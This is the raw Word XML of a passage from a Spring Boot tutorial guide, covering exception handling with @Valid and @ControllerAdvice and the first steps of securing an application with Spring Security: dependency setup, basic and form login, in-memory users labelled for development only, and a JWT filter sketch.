    <w:p w14:paraId="0FEC4F53"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Map&lt;String, String&gt; response = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ABE3BD"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sponse.put("message", "Validation error");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184CB988"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sponse.put("status", "failure");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52765139"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new ResponseEntity&lt;&gt;(response, HttpStatus.BAD_REQUEST);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2016E81A"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29D2F29B"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1CB1F0E3" w14:textId="77777777" w:rsidR="004459F6"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2CE80FC">
          <v:rect id="_x0000_i2572" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7173005D" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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5. Custom Exception Handling with @Valid for Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E1F00F"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You can use Spring's @Valid annotation along with exception handling to catch validation errors for incoming requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC36E73" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D712D68"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User {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E7E3E4"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NotNull(message = "Username cannot be null")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E9E6F"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String username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0E4DC" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A48B246"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getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC05EB"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26ABBDB9" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259A2246"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25219685"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questMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149843E9"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UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30720216" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C6C190"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    @PostMapping("/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC744D"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ResponseEntity&lt;Object&gt; createUser(@Valid @RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706704A"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logic for creating user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0E70D8"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ResponseEntity.status(HttpStatus.CREATED).body(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0BDD84"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383E02FF" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E05B5A5"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ExceptionHandler(MethodArgumentNotValidException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C165FF1"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ResponseEntity&lt;Object&gt; handleValidationException(MethodArgumentNotValidException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016B9B10"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Map&lt;String, String&gt; response = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182867B1"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sponse.put("message", "Validation error");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611EB197"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sponse.put("status", "failure");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718FCD59"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new ResponseEntity&lt;&gt;(response, HttpStatus.BAD_REQUEST);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C5CF9C"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23BA6C50"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41DA0E55" w14:textId="77777777" w:rsidR="004459F6"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73746E5">
          <v:rect id="_x0000_i2573" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6564A17A" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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Summary of Exception Handling Techniques in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6093B3EA"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Global Exception Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with @ControllerAdvice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69F5BF"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Using @ResponseStatus</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for HTTP status codes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05055CC8"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Controller-specific Exception Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with @ExceptionHandler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C52791"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Handling Validation Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with @Valid and MethodArgumentNotValidException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8BC762" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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se techniques help in centralizing exception handling, maintaining clean code, and providing consistent error responses across the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B586D" w14:textId="2C58659D"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E451C38">
          <v:rect id="_x0000_i2574" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="512974D2" w14:textId="1C5BBD82" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00286E36">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="598" w:name="_Toc196308078"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to provide security to spring boot applications</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="598"/>
    </w:p>
    <w:p w14:paraId="359E12B7" w14:textId="45D04E53" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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To provide security to a Spring Boot application, you can integrate </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is a powerful and customizable authentication and access control framework. Below are the steps to add security features such as authentication, authorization, and CSRF protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C40C7C8" w14:textId="77777777" w:rsidR="00A174AB"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C6D36FC">
          <v:rect id="_x0000_i2575" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3CFA35" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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1. Add Spring Security Dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A577FB9"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n your pom.xml (Maven) or build.gradle (Gradle), add the Spring Security dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CBA616" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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For Maven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AF7794"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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B3D95"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC66EA5"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lt;artifactId&gt;spring-boot-starter-security&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F90F9"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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B982E9" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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For Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE01869"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lementation 'org.springframework.boot:spring-boot-starter-security'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46153FF9" w14:textId="77777777" w:rsidR="00A174AB"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4E3475F">
          <v:rect id="_x0000_i2576" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38440667" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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2. Basic Authentication Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B67A2E"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pring Security automatically secures all endpoints with HTTP Basic Authentication by default. You can configure the authentication and authorization settings by overriding the default security configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077A0B9C" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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 Basic Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C0B6D"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context.annotation.Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF57CB"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security.config.annotation.web.builders.HttpSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08090C"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security.config.annotation.web.configuration.EnableWebSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324FE667"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security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E46DD7A" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAB65EA"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nfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D719E9F"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EnableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADF00B7"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582B6D35" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1509667E"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ADBA41"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otected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF1838"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE0F68F"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uthorizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F9A1A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                .antMatchers("/public/**").permitAll()  // Allow access to public endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A79C3A"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nyRequest().authenticated()          // Secure all other endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E215388"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nd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E68EA"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formLogin().permitAll()                  // Enable form-based login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BB10C"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nd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A4039C"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httpBasic();                             // Enable HTTP Basic Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642B40E0"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6A64BCF8"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35B27001" w14:textId="77777777" w:rsidR="00A174AB"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3601F1">
          <v:rect id="_x0000_i2577" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="197F9E26" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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3. In-Memory Authentication (for Testing/Development)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE2CBBB"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For development or testing purposes, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in-memory authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to quickly set up users and roles without requiring a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE9A0D" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758CBC0"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context.annotation.Bean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D553A"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context.annotation.Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0B48B2"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security.config.annotation.authentication.builders.AuthenticationManagerBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0981A"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security.core.userdetails.User;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D07E335"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security.core.userdetails.UserDetailsService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A41FDA"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security.core.userdetails.memory.InMemoryUserDetailsManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D66BF7D" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69CD21AF"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nfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D921967"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E574A9" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B95521"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203B5BE"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otected void configure(AuthenticationManagerBuilder auth) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1360234D"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uth.inMemoryAuthentication()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36FC63"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ithUser("user").password("{noop}password").roles("USER")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7D63BD"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nd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17683A94"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ithUser("admin").password("{noop}admin").roles("ADMIN");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C0F58"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420552B3"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61426B8D"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n this case, noop is a password encoder indicating plain text for development purposes (not recommended in production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24E7D9" w14:textId="77777777" w:rsidR="00A174AB"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8F5731B">
          <v:rect id="_x0000_i2578" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDF51B0" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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4. Custom Authentication Provider (Database or Custom Logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184DAF52"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f you need to authenticate users from a database or any other source, you can define a custom authentication provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774BA338" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC191A8"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context.annotation.Bean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFDACAD"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context.annotation.Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD6501A"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security.core.userdetails.User;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CBB475"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security.core.userdetails.UserDetailsService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED6E37E"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security.provisioning.InMemoryUserDetailsManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E21D56" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718C276F"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nfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D1BA32"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SecurityConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E0E729" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F10BEF4"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607A4CD0"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UserDetailsService userDetailsService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE1ADEA"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InMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D9C87E"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manager.createUser(User.withUsername("user").password("{noop}password").roles("USER").build());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED657D"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manager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B2C7A"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29C60369"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2C7DAABD"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o connect to a real database, you would implement UserDetailsService to load users from your database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BD519" w14:textId="77777777" w:rsidR="00A174AB"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B4DDD0C">
          <v:rect id="_x0000_i2579" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB0204" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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lastRenderedPageBreak/>
        <w:t>5. JWT Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64891683"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For token-based authentication, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JWT (JSON Web Token)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a popular choice. You would typically use JWT in combination with Spring Security to secure your REST API endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A318F3B" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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 JWT Authentication Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50BCFF"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security.web.authentication.UsernamePasswordAuthenticationFilter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666F787F"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security.core.context.SecurityContextHolder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E959F" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766EEDC5"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JwtAuthenticationFilter extends UsernamePasswordAuthenticationFilter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A485D2" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AAE8873"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final String jwtSecret = "your-secret-key";  // Use a secure key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5A8B4" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1815BDDC"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15216ACE"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Authentication attemptAuthentication(HttpServletRequest request, HttpServletResponse response) throws AuthenticationException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B180F"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String token = request.getHeader("Authorization");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA6CC45"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if (token != null &amp;&amp; token.startsWith("Bearer ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF73E37"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String jwt = token.substring(7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571ACB4D"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Parse JWT and authenticate the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F6249C"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Claims claims = Jwts.parser().setSigningKey(jwtSecret).parseClaimsJws(jwt).getBody();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E75422"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String username = claims.getSubject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F935F8F"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Retrieve user details and create authentication object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C5EE88"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UserDetails userDetails = userDetailsService.loadUserByUsername(username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5C9B5D"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new UsernamePasswordAuthenticationToken(userDetails, null, userDetails.getAuthorities());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC13553"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31277244"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super.attemptAuthentication(request, response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51576E9F"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223BB463"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6783FFA5" w14:textId="77777777" w:rsidR="00A174AB"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5261A81">
          <v:rect id="_x0000_i2580" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF35A4C" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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6. Role-based Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBEB08"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pring Security allows you to easily apply role-based access control for different parts of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED44815" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE0D9F"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nfiguration</w:t>
      </w:r>
    </w:p>
